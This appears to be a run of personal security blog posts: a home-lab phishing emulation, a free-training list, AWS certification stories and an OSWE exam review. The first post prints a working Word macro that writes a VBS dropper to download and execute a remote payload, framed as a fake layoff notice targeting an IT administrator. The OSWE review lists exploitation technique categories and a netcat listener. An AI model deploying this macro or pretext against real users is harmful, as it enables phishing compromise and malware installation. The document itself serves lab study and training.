Life after CISSP:

I had so much housekeeping that I couldn’t attend to while studying (physically and digitally). My office was a complete mess. I lost access to my switch since there was a power outage and sadly I didn’t copy running-config to startup-config. Off my switch is basically everything besides wireless. My ESXI lab, my NAS, all my Raspberry Pis, and everything else. It’s tough to go from risk management to configuring ACLS and VLANs Took me about a week to update (and save) switch configuration, cleanup my NAS, cleanup all my machines & VMs, destroy my ESXI lab and rebuild it. Just like before my ESXI lab simulates a corporate network, active directory environment with an assortment of machines running various services. I use PFSense as a virtual firewall/router. This allows you to simulate someone attacking over the WAN and having your LAN protected by a security device just like normal. You can google security courses, CTFs, to get an idea of typical lab environments. This is helpful because after you spend days importing/uploading/provisioning 5 VMs – now what? You still don’t have any services or applications running. This groundwork is fruitful we all have to spend the time to stand things up before we can even begin to start thinking about playing around.

---

Keeping Busy:

I begin to think about what I want to learn more about. I find an Advanced Penetration book focusing on adversary emulation and APTs that I fell in love with. It’s ironic as well because the only reason this book stood out was it was only 230 pages. I thought damn either this things is complete garbage and captures .01% of something irrelevant that some other guy loved or it’s chock full of gems. It was the latter! My heads spinning as we write our own VBA dropper, that writes a VBS file to the disk, that download the payload and execute reverse shell. At the end of chapter one we’re on writing your own C2C infrastructure implementing libssh. Just something about seeing that hardcore C with the Windows API calls that brings fear and so much curiosity! Progressively improving our payloads and infrastructure as it progresses. Here’s the book

I bet you can see where this is going. To reinforce concepts I replicated the payloads and attack from the book in my lab environment.
Here’s the scenario:

1. Somehow through password reuse you’ve gained access (attacker) to an organizations webmail login
2. As a budding hacker you understand situational awareness. Your target is an IT Administrator – whom is probably already a little concerned over his job security. Since through
   reconnaissance you’ve learned that 30% of the entire IT staff has already been furloughed since the pandemic began.
3. You craft a fake Word document that seems to be a notice of this months layoffs and “mistakenly” send it to the administrator. You dress it up really nice with all the Confidential headers and footers. Of course there is no document it’s a blurred image and enabling macros is going to begin and carry out the compromise. Is looks like this
   

   ---

   

   ---

   ---

   Payload:
Sub AutoOpen()
Dim PayloadFile As Integer
Dim FilePath As String
FilePath = "C:\tmp\payload.vbs"
PayloadFile = FreeFile

' Create VBS dropper, write it to disk and execute it. VBS reaches out to remote server downloads payload and executes it.
Open FilePath For Output As PayloadFile

Print #PayloadFile, "HTTPDownload ""https://REMOTE-SERVER/PAYLOAD.EXE"", ""C:\tmp\"""
Print #PayloadFile, ""
Print #PayloadFile, "Sub HTTPDownload(myURL, myPath)"
Print #PayloadFile, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg, currentChar,res,decoded_char"
Print #PayloadFile, " Const ForReading = 1, ForWriting = 2, ForAppending = 8"
Print #PayloadFile, " Set objFSO = CreateObject(""Scripting.FileSystemObject"")"
Print #PayloadFile, " If objFSO.FolderExists(myPath) Then"
Print #PayloadFile, " strFile = objFSO.BuildPath(myPath,Mid(myURL,InStrRev( myURL,""/"")+ 1))"
Print #PayloadFile, " ElseIf objFSO.FolderExists(Left(myPath,InStrRev( myPath, ""\"" )- 1)) Then"
Print #PayloadFile, " strFile = myPath"
Print #PayloadFile, " End If"
Print #PayloadFile, ""
Print #PayloadFile, " Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True)"
Print #PayloadFile, " Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"
Print #PayloadFile, " objHTTP.Open ""GET"", myURL, False"
Print #PayloadFile, " objHTTP.Send"
Print #PayloadFile, ""
Print #PayloadFile, " res = objHTTP.ResponseBody"
Print #PayloadFile, " For i = 1 To LenB(objHTTP.ResponseBody)"
Print #PayloadFile, " currentChar = Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))"
Print #PayloadFile, " objFile.Write currentChar"
Print #PayloadFile, " Next"
Print #PayloadFile, " objFile.Close( )"
Print #PayloadFile, " Set WshShell = WScript.CreateObject(""WScript.Shell"")"
Print #PayloadFile, " WshShell.Run ""C:\tmp\PAYLOAD.EXE""
Print #PayloadFile, " End Sub"
Close PayloadFile
Shell "wscript c:\tmp\payload.vbs"
End Sub


   ---

4. The administrator viciously open the email, macro detonates, payload execute and you get your reverse shell.

Now that we got a way to execute payloads now on to converting the payload into a C2 host and setting the infrastructure! Here’s a videos of the process.

How’d I Get Phished from S7acktrac3 on Vimeo.

The post Pharm Raised Phish 😅🤠 appeared first on Certification Chronicles.

Hello Community,

Really terrible times we’re living in right now. It doesn’t help to literally be right in the “thick of it”. My family and I are unaffected at the moment. Praying for humanity at this point.

Anyways – there’s been a bunch of free goodies going on and I wouldn’t be proper if I didn’t attempt to put some of them in a central place to provide to others Hats off to these organizations since none of this was required at all.

Leave a comment if you’ve found something I haven’t mentioned for others who visit after you. Stay Safe

 

• PluralSight_Software Development-Information Security-IT Operations
• PentestSkills_Empire-Mimikatz
• SecurityInnovation_Secure Coding-Software Security/Hacking
• CyberSafe_Non-technical Beginner Hacking Videos
• Udemy_Technology-Leadership
• Nikon_Photography
• Skillshare_Technology-Business-Art-Requires-CC-Remember-To-Cancel
• ClassCentral_Free-University-Courses-Variety-Of-Subjects-With-Certificates-XD
• Google_Free-Month-Google-Cloud-Training
• Oracle_Free-Cloud-And-DB-Training
• Manning_Free-Beginner-Programming-Books-HTML-CSS-JS-PYTHON
• Autopsy_Digital-Forensics
• From An Old Buddy/Colleague! Learn BURP Suite
• ECCouncil_30-Days-Free-Cyber-Training-Requires-CC-Remember-To-Cancel
• Packt-Free-Workshop-Access
• Juniper_Junos-Genius-Challenge-Package-Code-junosgeniusfree
• Hoppers_Roppers
• Free-Elastic-Training
• Cisco_PCAP-Programming-Essentials-in-Python
• Azure_Fundamentals-And-Voucher

Note: I get no credit for any of this! I’m simply compiling the materials in one place for you

The post Free Cyber Materials BC Of Covid appeared first on Certification Chronicles.

 

 

When the dust settled here’s what I was left with

Date: Monday 05/04/2020 – 1800 hrs
Thoughts: “You should be embarrassed at how severely deficient you are in practical cloud knowledge.”

Background

This is exactly how all my journeys begin (inside my head) typically being judgmental and unfairly harsh on myself. That evening I started to research the cloud market share of Amazon, Azure and Google. It confirmed what I suspected with AWS leading (~34%) Azure having roughly half of AWS (~17%), Google (~6%) and the “others” accounting for the rest. Note: Although Azure owns half of AWS in market share percentage, their annual growth is double that (62%) of AWS (33%). I would start with AWS.

Now where do I begin? I reviewed their site listing all the certifications and proposed paths to achieve. Obviously the infosec in my veins wanted to go directly for the AWS Security Specialty but I decided not do that. Why? Figured I would be cheating myself. I would start at the foundational level and progressively work towards the Security Specialty. To appreciate the view so-to-speak. Security Specialty would be my end goal.

I fumbled my way through deploying AWS workloads previously. I used EC2 before (didn’t know what it stood for or anything beyond that – a VM in the cloud was the depth of my understanding), S3 was cloud storage (that I constantly read about being misconfigured leading to data exposure).

As always, there’s absolutely zero pressure on me. Only the pressure of myself which is probably magnitudes worse and more intense than what anyone from the outside could inflict on me.

---

AWS Certified Cloud Practitioner CLF-C01

The next day I began researching Cloud Practicioner. This involves a ton of sophisticated research better known as Google in addition to, trolling all related Reddit threads that I can find. This is how I narrow down what are the best materials to prepare and what to avoid. 99% of my questions have already been answered.

After the scavenger hunt I felt like I could probably pass this one without doing any studying at all. Sometime I have to get outside of my own head. Not sure why I have all the confidence but it’s there (for no reason  in this case) and sometimes it burns me (keep reading).

I sped through the Linux Academy Practitioner course in 3 days. It was mostly review and everything you would expect for a foundational course. Some of the topics:

• • What is the cloud & what they’re made of
  • IAM Users, Groups, Roles
  • VPCs
  • EC2
  • S3
  • Cloudfront & DNS
  • AWS Billing

Date: Monday 05/09/2020 – 0800 hrs

From initial thought, it’s 5 days later. Exam scheduled for 1800 hrs I’m excited but nervous, unsure what to expect. The course prepared me well and the exam felt easy. I knew by the last question I had definitely gotten enough points to pass. I click next on the last question to end exam. AWS in a horrible play forces you to answer a survey before providing you the result.

I PASSED! You have to wait for a day or two to get the official notice that has a numeric score.

---

AWS Certified Solutions Architect – Associate SAA-C01

I clapped for myself but didn’t feel like I had done much. Practitioner is labeled foundational for a reason. Now it’s time to aim for a bigger target. Solutions Architect wouldn’t be easy it would take a whole heap of studying to clear it. I followed a similar approach going through the Linux Academy Solutions Architect Associate course.

Funny how the brain works because although Practitioner was easy it still gave me a chip on my shoulder going into this. Pick a post on Solutions Architect Associate and you’ll hear the pain, how tough it was, how it was most challenging cert of folks lives. I know from CISSP not to listen to this. I’m not sure if folks don’t fully prepare or just feel better about themselves exaggerating the complexity after passing to continue the horror stories. Maybe impose some of the fear they had onto others who are coming behind them?  One thing about me, I get tired of studying for the same thing quick. There’s no way I would/could ever study for a cert for 5 months, 6 months, a year. Yeah-Freaking-Right.

The cool thing about AWS is that all the certifications are built upon the foundation. No matter which one  you go for it’s pretty much going deeper into the usage, capabilities of appropriate related services. I chose to sit for C01 although C02 was recently released I wasn’t going to risk being a live beta tester. I was concerned with the newer exams’ stability. As I write this C01 is officially dead in 3 days, July 1 2020 then all candidates will only have C02 good luck .

Date: Monday 05/014/2020 – 0800 hrs

5 days later after Practitioner (10 days total elapsed time from initial thought)

Okay I told you to keep reading I wish somebody would have stopped me. Since no one did the universe had to step in. In a cocky rage I take the exam after studying for only 5 days. Clicking through the survey I was heartbroken I had FAILED and I really deserved it. Who the hell did I think I was?

This is typically the time where you punch yourself and call yourself stupid. This hurt me more than it should have. I was pissed at myself. For not taking enough time to study, sure but the real hurt was because I couldn’t will myself to pass even with minimal studying. LMAO. (WTF Bro) Here’s what I woke up to the next day.

What I only missed it by 20 points FML that made it worse.

You BIG Dummy!

Okay. I picked myself up and scheduled my retake for exactly 2 weeks out. After seeing that score I felt like if I could have retook it the next day I would have passed (again idk why, maybe that’s my way of dealing with failure, going even further balls to the wall ) The mandatory 2 weeks felt like forever. I was studying at least 6 hrs a day on weekdays and sun-up to sun-down on weekends. Nothing or anyone could get any of my time. Besides this, the only other cert I ever had to retake was CRTP. It humbled and fueled me more.

I figured I needed to learn from an alternative source – I went to AcloudGuru’s course which I felt was really lite compared to Linux Academy. The last week I found this Udemy course. Stephane Maarek the instructor is the Thank You sir! In hindsight I could have used this alone to pass the exam. It was that good. Here’s another review I found useful while preparing for my retake. Thank you Jayendra

Date: Monday 05/28/2020 – 0800 hrs

14 days later after 1st Solutions Architect Associate attempt (24 days total elapsed time from initial thought)

I felt pretty confident this time (it’s justified this time). I realized how much I didn’t know  after this go around and how I maybe didn’t deserve the 700 the first time. I definitely was gunning for a perfect exam . And I forgot to mention when you pass any AWS cert you get 50% off the next, so me failing the first one totally screwed up the financial efficiency I had to pay full price for this one. I PASSED. But did you get the perfect score I definitely didn’t feel like there was ANY question I didn’t know the answer for. Here’s what I woke up to the next day

God knew not to give me a perfect score! Probably would have done more harm than good I was very proud of my score. I ASSAULTED/CRUSHED/ANNIHILATED THAT EXAM. TEACH YOU WHO YOU DEALING WITH This is how I was feeling at the moment!

via GIPHY

---

Amazon AWS Certified Security SCS C01

I needed a break so I took a weekend off. Come Monday I was right back in the grind I wished Stephane had created a course for the Security Specialty but he didn’t I went through Linux Academy course. After that, I brought John Bonso course at tutorialsdojo.

Listen. LISTEN. LISTEN  The length of these questions are in-freaking-sane. I remember one night losing track of time, completing only like 20 questions but over 2 hours had elapsed. It quickly negged me out. I love reading but my gosh these were monsters and the scenarios were ridiculous. I was like bump this I’m not sure I really even want this thing that bad.

via GIPHY

I took like 2 weeks off and came back to it! I wondered if I forgot all the things I had learned from the course, I hadn’t. Mentally I needed to prepare myself for those questions. Ultimately it’s discipline, will, and patience. Eliminated all distractions once again – nobody can get a hold of me and every ounce of free time is devoted to the task at hand. After completing all the questions there I used my free AWS practice exam. It stinks because they don’t even give you the answers. Like WTF is that about? I found any practice questions I could on on the internet for 3 days straight.

Date: Monday 06/26/2020 – 0800 hrs

Now my birthday is 7/8 so I was going to schedule the exam for 7/7 to wake up to the pass on my birthday. I quickly decided not to do that in case i failed so I scheduled it 4 days out on Monday 6/29.

Told you guys I don’t like studying for long. Later on that day at about 1400 hrs I don’t know why but I went back to the exam scheduling and saw they had a exam slot for the same day at 1545 hrs Forget it! I rescheduled it and confirmed it. As soon as I did that I thought, “why the hell did you do that”?

If it was one thing I knew it was this. I was going to be even more disappointed than I was when I came up short for Solutions Architect for the first time. I imagine it would have been something like this after failing.

via GIPHY

Exam was TOUGH. No other way to put it and guess what? Every single question was a monster just like the Bonso questions. 2 paragraphs minimal sometimes like four, tough scenario involving 3-4 services and baking security into it. All the choices are basically the same and differ slightly by the last 2 or 3 words. By the end you’ll be able to read 2-3 choices at the same time, scanning for the differences and then selecting your answer based on that.

All my exams were taken remotely and one thing I think could have pushed me over the bridge for Solutions Architect that’s UNDERRATED is the “Whiteboard” feature on Pearson exams. I used that thing for mostly every question for Security Specialty. Unless you’re a Jedi it’s really tough to have a good understanding of what the monster is asking you without a visualization. You aren’t allowed to use pen and paper. Use the Whiteboard!

Time wise I breezed through Practitioner in ~35 minutes, Solutions Architect ~55 minutes, and this thing #bruh I remember looking up thinking sheesh you’re two hours deep. I had finally finished all 65 questions. Enter second guessing yourself:

I’m not clicking next or ending exam this time! There was maybe 20 questions I was unsure on. You don’t have to be a mathematician to realize 20 wrong answers out of 65 equals a fail. Listen – reviewing your answers when you’re confident is a cursory thing; when you’re not confident it’s like play Russian roulette. I changed about 9 answers total each one filled with a thought, “You’re probably on the borderline right now, you’re going to change an answer that’s correct, make it wrong and that’s going to be your demise”. It’s worth mentioning that only say 50% of the questions are single choice. The others are select the best 2, 3 out of 6,7 selections. The questions are random from a bank like most of the exams so I’m not sure if same will apply to you, but I did notice at least 2 instances where future questions cleared up previous ones. Example

• • Q3   – Which of the following bucket policies allows users from account xyz123 to put resources inside of it?
  • Q17 – Based on the following bucket policy that allows users from account abc456 to put resources inside of it, what of the following accounts wouldn’t be able to access objects?

Flag questions that seem similar so when you review you can easily identify, compare, contrast you may get a bone thrown your way.

Majority of the exam was exactly that reading, understanding policies – IAM, KMS, Bucket policies you better be able to read and understand them as if they were plain English. There was a ton of KMS related things, make SURE you know the nitty gritty like imported key material, all the different type of KMS encryption types when, where, rotation ect.

Clicked next, through the survey and I had PASSED!

---

I think I’ve paid my dues this year guys. I stepped outside of my comfort zone entirely & I’m very proud of that. This year’s timeline looks like the following:

• CISSP 4/9
• Cloud Practitioner 5/9
• Solutions Architect 5/14
• Security Specialty 6/26

Because of Covid-19 this will be the first year since I’ve not been poor (after graduating ~5 years) that I won’t be on an island celebrating. Such is life. I brought myself AWAE as a birthday gift I’m going to dig into that starting July 11.

If you need advice, support or just want to talk I’m always around. Stay safe and definitely stay thirsty (for knowledge).

The post AWS Certification Trifecta appeared first on Certification Chronicles.

Introduction

Once again I am victorious! Being completely transparent, passing that exam was hard – there were periods that totally made me doubt myself. During these times all the blogs you’ve read about people failing multiple time begins to resonate with you. Thoughts such as “who the hell do I think I am to not experience the same” start to creep up. Many people assume since I have a number of certificates that maybe the process is somewhat trivial or that I’m some super smart genius. That is 100% false. It’s a grind, a fight and a constant mental battle. The only difference for me is I have been through so many battles that I can more easily block out the noise, not let it totally consume me and rely on previous successes for confidence. This still takes effort though.

Before we start, there is no way I can provide better information on how to pass the exam than what’s already publicly available. That’s all included in the bookmark section. If you don’t care about the journey feel free to skip to the exam & methodology sections. I never try to give the best because best is subjective, relative and in most aspects I’m still a student. I attempt to provide what I felt was missing from most blogs I read when attempting to study. The context – the thoughts, feelings, emotions and situational metadata most authors never include.  So let’s begin with that.

Mindset

I never pursue certificates for job promotion, advancement or anything besides enhancing my personal knowledge. Therefore it’s never any pressure on me. Besides the kind that’s self injected. It’s all for the love of learning security and its related disciplines. So If you’re the type who brute forces exams and doesn’t really care about the knowledge gain you’re probably not going to like it here. You’ll get (some) technical details sure, but it won’t be an exam dump thanks-goodbye post. That’s not the point. There’s nothing wrong with trying to put yourself in a better position but you should be driven solely by passion. That behavior waters our field down – you’ll meet folks with certificates abc-xyz who can’t think or speak beyond basics. To each’s own.

Why Go After OSWE

What makes a man go after any certificate it seemed like beautiful pain. I hope no one has forgotten that I obtained CISSP at the beginning of the year, Certified Cloud Practitioner, Certified Solutions Architect, and Security Specialty AWS certificates towards beginning of the summer. I didn’t plan on any of this I just identify areas where I’m weak and find the best certificates to try to bridge the gap. I couldn’t take it anymore in June, after aimlessly doing nothing for a whole week. I justified purchasing a new course as a birthday gift to myself how pitiful I know.

I don’t perform any exploit development, penetration testing or malware reversing for work (90% of this blog). I learn them for fun and to understand the more difficult domains of security. Work is mainly Application Security – so this was one of the rare times I found a certificate that actually aligned directly with what I do day-to-day. That’s not to say that those topics don’t contribute to me having a more intimate comprehensive understanding of security because they do.

I knew the course was mainly source-code review. I thought this was AWESOME since there’s not many white-box based courses vs.  1-million black-box counterparts. I figured because of this a large majority of folks would wash this course and certificate down the drain. Folks want to use their tools and get root If you’re a security professional and you run from source-code I can’t take you serious. If you can only leverage tools written by others and not develop your own you’re going to severely limit yourself. That’s one thing, maybe more important for web application security professionals – the vulnerabilities occur in the source-code they just manifest themselves in the applications, the exploits that take advantage of the vulnerabilities need to be developed in some source language. The point is we all need to be comfortable and at-home at the source level. We’re more valuable to our teams, developers and the organizations we defend.

Signing Up

You need to register for the course well before you anticipate starting. The slots fill up pretty fast. The same goes for registering for the exam. I registered on June 29th and the first available lab date was July 11th which I accepted and anxiously awaited. I decided to do 90-days of lab time since I already did the other certificates I planned to slow roll this one and if possible, pass the exam by end of year.

The Lab

If you are not familiar with Offensive Security courses at the exact time your lab is set to begin you’ll receive an email with your VPN credentials, course PDF, and a link to download the videos that go alongside the PDF. Some people are religious about the order in which they prepare whether it’s video first, PDF first. Personally for me I watch the videos for the entire module once and then replicate using the PDF as reference, if needed. Since the videos tend to be more verbose.

Along with the materials, once connected to VPN you get your Control Panel to revert machines. Unique to this course, you’re provided with a WIKI. It contains the list of machines in your lab, their IP addresses and credentials. In addition to that you’re provided with skeleton code for most of the exploits throughout the different modules. Thanks offsec! I would recommend you write it all out by hand and never touch these.

I start the lab and 5 days later guess what? The course gets updated! I get an additional 30 days of lab time for free. Talk about positive vibes!

Prior To Upgrade

The PDF was 267 pages, the videos and included 6 modules.

After The Upgrade

The bulked-up PDF was now 412 pages, included the original 6 modules, 3 additional lab machines with more modern vulnerabilities and exploitation techniques, and  3 machines with no solution purely provided for exam preparation. Of the new 3 lab machines 2 were white-box and 1 was black-box. That’s slightly incredible to receive seemingly 50% more content essentially On the house. I welcomed it with open arms.

Throughout the lab you’ll become one with all sorts of SQLi’s – union-based, time-based, boolean-based, mysql flavor, postgres flavor. Authentication bypasses using session hijacking & session riding will become natural, XXE’s, SSTI’s, deserialization, file upload bypasses and others. You’ll find a variety of languages including Java, PHP, Node.js, Python, C# and Web Frameworks to analyze and get comfortable with. For the compiled languages you’ll learn techniques to recover the original source-code. They’ll drill the importance of database query logging and how to set it up with the many databases throughout the course.

The difference in this course is the perspective and mindset to which you approach finding the vulnerabilities. They’re all impossible to discover purely from a black-box perspective, you won’t be throwing a vulnerability scanner at any of these boxes to find anything, sqlmap will not work (not allowed in exam anyway)! Run nikto, gobuster (or any other kali tool) if you want but it’s useless. You need a healthy combination of brainwork, understanding sources to sinks, routes and controllers. Become comfortable understanding code flow and lots of it. Following the lab guide and videos there are still modules that take multiple days to grasp and over a week to replicate. It’s a marathon not a sprint.

Losing Steam and Yolo’ing It

I was super motivated initially (month 1) putting in like 3-4 hours weekdays and 8+ on weekends. Life happens and you naturally start to lose steam. That’s why I typically troll Reddit for Discord groups with others studying for same or similar certificates. Because you’re not always going to be motivated and having others locked-in keeps you accountable and in the game. There will always be folks to bounce ideas off of, rant and cry to. Probably the most special part is just having friend across the globe that love the same thing as you. Once you have enough friends it’ll be impossible to slack because you’ll have friends in all time zones during breakfast, lunch, dinner and while you sleep to exchange knowledge with. Greetz to all my boys in the Discord server mentioned below.

Towards the beginning of October (month 3) I found myself skipping the lab completely for 3-4 days at a time. It was easier to to say whatever. My original exam date was October 30th and I felt like this exam was consuming me way too much and I was in the lab for way too long. I developed my methodology discussed below, rescheduled the exam for a week earlier 10/24 at 10:00 EST.

I had completed the entire lab twice (excluding the 1 black-box machine from the updated materials) I honestly watched the videos 3 times and still didn’t really grasp how I would have been able to achieve such madness start to finish and wrote it off as not needed. The 2nd time through the lab I took detailed notes – what were the high level steps to achieve authentication bypasses, what did I exploit to get RCEs, what was the syntax of the commands I used, what did I screw up on or miss that I should be on the lookout for if I come across similar situation. Lots of times I make snarky comments reminding myself how much of an idiot I am. It helps make things stick.

2 Weeks Before Exam

During the last 2 weeks I decided to give the 3 boxes without solutions a shot. It was a fight (struggle) but I managed to get RCE on both maybe in like a week and a half. I can remember going an entire weekend stuck and making no progress on one. Those were hard but it’s a shift in your mindset. You gain this fake confidence in the lab since you can simply look at the PDF & videos and you say to yourself , “I knew that or I would have been able to figure that out”. With no solutions your are on your own and at the mercy of your own brain. Again, like the black-box from the lab the black-box with no solutions was a brain fu*k. I got the authentication bypass but didn’t want to waste my remaining time on a exam for source-code review worrying about wicked black-box exploits. Not sure why they included these – I guess it’s to supplement those who don’t have experience analyzing from black-box perspective since in white-box you tend to leverage both. You see an input field or parameter that looks suspicious, find the method in the source-code responsible for processing that input then follow it to see if it’s sanitized or used in an unsafe way. If those black-box boxes (say that a few times fast) don’t make you sweat – you’re much more 1337 than I am!

Enter The Exam

I have been working on my zin a bunch lately. I spend absolutely zero energy on events I can’t control (weather, politics, someone’s thoughts of me, etc). I spend majority of my energy on things I have full control of (thoughts, discipline, being thankful, positive outlook). Finally there’s things that I don’t control fully but have some control of (certification exams). For these I shift my goal not to passing but giving my absolute max, trying my best and if I come up short I still achieve my goal. This reduces negative emotions like anxiety and regret.

So it is the Friday evening before the exam and I’m pumped. I’m excited to have a chance to perform. I really only judge myself when I’m facing challenging situations. It’s when your back is against the wall that determines your resiliency not when things are rosy. I’m a little nervous for the unknown, the shock factor. My only hope was that when I gained access to the exam that it didn’t feel like I had been studying for a different certification.

Day1 – 04:30 a.m – I get out the bed since my mind has been racing for a half hour already. I watched the lab videos of exercises I thought were relevant. Ensured my notes were organized once more and wrote myself some positive notes in size 50 font bolded. The time was dragging but I used it wisely. My fear at this point is that I’m going to get sleepy during the day since I woke up so early, but so be it.

Day1 – 09:45 a.m – I sign into the proctoring software, verify my credentials, display my workspace, and share my screens. I can’t provide specific details here but after connecting to the exam VPN I was provided 2 web application and their source-code. The Control Panel provided details and instructions on how to access each, the point breakdown and what constituted successful compromise. The proctor has no audio, you’re able to communicate with them via chat and your webcam is on at all times. I had been through the exam guide and proctoring manual maybe 15 times before this moment. You definitely don’t want to have IT issues the day of your exam.

Box-1 Start

Day1 – 10:00 a.m – I’m off to the races. I went to the homepage of the first application to see what type of application it was then directly to the source-code. My brain is firing on all cylinders but there’s a LOT of code. Connect the dots. I got the authentication bypass at 18:53. At this point I’m thinking, “Damn I might fail this based off running out of time”.

Box-1 Authentication Bypass Complete (8hours 53 Minutes)

Did I mention I had PRK eye surgery a week before the exam? It’s like the precursor to LASIK but more stable and permanent. This is significant since folks typically want to know how often you took breaks. I was taking medicated eye drops every 4 hours, rewetting drops every hour, and every half hour I’d have to look away for at least a minute to focus on objects far away so I didn’t hurt the recovery of my eyes. I took one break of 30 minutes to eat in that time to get the first authentication bypass.

Day1 – 10:00p.m – Things are hazy and waking up so early is beating me up right now. I know exactly what I have to do and I’m trying but it just won’t work. I’m making stupid scripting mistakes and wasting time on silly things being tired. I take a small break and promise myself I will go to sleep if I can get the RCE.

Day2 – 12:00a.m – I get the RCE and fulfill my promise. I feel okay now since I think I started with the tougher application and it took me around 14 hours start to finish. Off to sleep.

Box-1 RCE Complete (14 hour 15 minutes)

Box-2 Start

Day2 – 04:00a.m – What is up with me and 4 am but anyway that 4 hours felt marvelous and I felt like a tiger waking up! Very motivated. I put on the tea kettle to make myself some ginger tea, notify the proctor I’m back sit back down and lock back in.

Box-2 Authentication Bypass Complete (29 hours 53 minutes)

Day2 – 2:23p.m – I noticed the authentication bypass for this one in less than a half hour. Noticing it and pwning it are totally distinct things. I got the authentication bypass at 14:23. Yes. Imagine knowing what to do and it taking 9-10 hours. The good thing about the second box was I discovered the RCE while doing reconnaissance for the authentication bypass.

Box-2 RCE Complete (33 hours)

Day2 – 05:00p.m – RCE done! Although I have all the points now I also have a very important upcoming week at work and although I could wait until tomorrow (Monday) after work to write the report my exam time expires at 10am Monday. I take a break, eat dinner and start to write the report.

Writing The Report

Day2 – 7:00p.m – I had been taking screenshots throughout but I noticed how much I didn’t grab when I started to go through the sections of Offensive Security’s exam template. TRUST ME .. TRUST ME you do not want to get lazy on the report after you’ve done the exam because they will fail you without hesitation! There are plenty of horror stories. Myself being a former penetration tester and have gone through a couple Offensive Security certificates before I understand the level of granularity they expect you to provide.

Along with the proofs and screenshots you should include your methodology to achieve compromise along with your attack code. I provided everything, what I was thinking, vulnerable methods, pitfalls, and all the other (relevant) things firing off in your brain during a 48 exam.

Day3 – 12:00a.m – I proofread the report with glossy eyes 4 times, completed the process of uploading the exam reports. After I got the confirmation email I went to bed.

I had to wait an entire 5 days from Sunday night -> Friday to receive my results that I had achieved the OSWE certification

Exam Methodology

Everything I’m about to mention is taught and reiterated throughout the course. What’s the point? During the exam you’ll need to absorb and internalize tons of new information. A methodology is a general approach that you can refer to when you hit a snag.

If you don’t know how to debug you are dead. You cannot pass without understanding how to debug properly. In interpreted languages adding print statements. In compiled languages actually stepping over/in methods examining objects, properties and values. Leverage all the techniques taught throughout the course.

General

• Examine unauthenticated areas of the source-code first
• Leverage Visual Studio Code Remote SSH Extension
  • Understand the launch_json files in Visual Studio Code
• Examine the routes to see all the endpoints. Understand the authorization applied to each
• Review the controllers to understand how user input is handled by the application
• If possible, always enable database query logging
• DnsSpy to decompile .NET, JDGui for Java
• After checking unauthenticated areas, focus on areas of the application that are likely to receive less attention
• Investigate how sanitization of user input is performed. Is it done using a trusted, opensource library, or is a custom solution in place
• When auditing realize which code you can reach regardless of conditionals, loop

Potential Authentication Bypass Techniques

• SQLi
  • Can we create a user account
  • Can we leak hashed passwords, reset tokens an other information to aid in authentication bypass
• Broken Authentication
  • Does authentication depend on private information that we can leak from DB using above
• Regular – Time Based – Boolean Based (examples and templates for each)
• PHP Type Juggling
• Reading Arbitrary Files w/ XXE
• XSS -> CSRF (Session Hijacking or Session Riding)

Potential Remote Command/Code Execution

• Code Injection (Eval – Node.js)
• Deserialization Bugs (Java .Net)
• SSTI
• Unrestricted File Upload

Hail Mary

• User Defined Functions
• 3rd Party Frameworks & Libraries
• APIs
• Client Side Attacks
• Reversing Authentication
• Brute Forcing Tokens
• JSP Web Shells

Useful Bookmarks

All the blogs that I used to study. Shoutout to all the authors! Thank you.

• GitHub – timip/OSWE: OSWE Preparation
• GitHub – wetw0rk/AWAE-PREP
• OSWE Exam review “2020” + Notes & Gifts inside! — Hack The Box :: Forums
• Nodejs RCE and a simple reverse shell
• How to exploit the DotNetNuke Cookie Deserialization – Pentest-Tools.com Blog
• Exploit CVE-2017-16088 – ༼ つ ◕_◕ ༽つ
• us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
• ManageEngine Applications Manager Deserialization Unauthenticated RCE · Application Security Blog
• GitHub – softwaresecured/secure-code-review-checklist: A starter secure code review checklist
• Mr. Me Blog
• PHP Dangerous function · rinku191/OSWE-prepration Wiki · GitHub
• SQL Injection and Postgres – An adventure to eventual RCE
• My AWAE / OSWE Experience | Dan Helton’s Blog
• Offensive Security Web Expert (OSWE) – Advanced Web Attacks and Exploitation – vesiluoma.com
• Deserialization – HackTricks
• POSTGRESQL CODE EXECUTION: UDF REVISITED | by AFINE | Aug, 2020 | Medium

Discord Server – https://discord.gg/EDsJkzz8tG

AWAE Hindsight

• Offensive Security provides you with everything you need to pass the exam but you will also learn new things during the exam
• I didn’t feel the pain folks were experiencing about latency. I did not touch their Kali instance
• Be ready to be rattled. Things aren’t in the regular places, named differently, paths are different. During the exam do not underestimate how much this can freak you out. Basic Terminal/Powershell System Administration knowledge is your friend – grep, find, writing regular expressions and locating processes
• Writing the POCs takes the most time since you need to script the entire exploit in one shot. Even with a developer background this took the most time. If Python is your language of choice be sure to know requests inside & out and in particular the session object!
• Setup local or remote debugging for each lab machine and script the entire exploitation in one shot. This means in one terminal nc -nvlp <port> and in another python main.py 192.168.1.1  and you receive a shell
• Go through all the modules and where Offensive Security says, “after some time we zeroed in on this class” actually go through the entire result set and try to analyze it as if you didn’t know which class contained the vulnerability. In the course it’s easy to say, “Oh they only had 40 results I would been able to filter through those until it’s time to do that”

Conclusion

As long as I’m more knowledgeable than I was prior to starting the course I had a good time and positive experience. No course is perfect so I don’t knit-pick. Some things exceeded my expectation some didn’t. I would recommend the course since you can’t find any competing courses with the same focus. Thank you Offensive Security.

What’s Next

• Windows Kernel Programming by the awesome Pavel Yosifovich. I purchased this and really liked it but got caught up. I’m going to finish it this time!
  
  

 

• SANs 642 London December 2020 Shoutout to my boss! He kept a SANs voucher for me on ice which I graciously used the day after submitting my OSWE report #whatbreak
  
• I am waiting until the new Offensive Security Exploit Development course comes out early 2021. I’m more interested in that than the PEN-300 they just dropped.

 

The post OSWE Review (AWAE Course) appeared first on Certification Chronicles.

Greetings, everyone! I’m back with the grandest of brooms, ready to sweep away three years’ worth of dust that’s gathered on this aging blog. Over this time, my life has seen significant changes, both personally and professionally. The most remarkable of these changes has been embracing the title of a girl-dad – an experience that has transformed my life in ways I never imagined. As outlandish as some of the rumors may be, I’m here to set the record straight by confirming that the answer to the top three questions people have been asking me is emphatically ‘NO’:   

1. Did I vanish into a cosmic abyss?
2. Did I unearth and capitalize on a zero-day exploit, catapulting me into the elite 1%?
3. Did I amass a fortune in Bitcoin and bask in retirement on the pristine shores of the Cayman Islands?

The purpose of this post is threefold:

